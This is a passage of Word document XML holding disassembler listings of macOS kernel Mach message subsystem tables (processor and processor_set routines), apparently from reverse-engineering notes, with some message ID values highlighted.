      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq offset _Xprocessor_start; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 1                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04848                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 2Ch                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 3B8C7000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 1                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 db 2Ch, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 2Ch                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 3B8DC0h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 5                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 7000000000h          ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 3B9000h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 3FFFFFF80h           ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04848                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dq 2Ch                  ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04848                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00ED4A5C" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>processor_set_subsystem()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 public processor_set_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958 ; const processor_set_subsystem processor_set_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958 processor_set_subsystem_0 dq offset processor_set_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                                         ; DATA XREF: processor_set_server_routine:loc_FFFFFF80003B98F2o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                                         ; processor_set_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E04958                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">0FA0h </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">               ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd</w:t>
      </w:r>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0FAAh   </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">             ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 54h                  ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq offset _Xprocessor_set_statistics; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 4                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 44h                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 3B9B1000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E04958                 dd 1                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 db 2Ch, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 2Ch                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 3B9C60h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 3                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
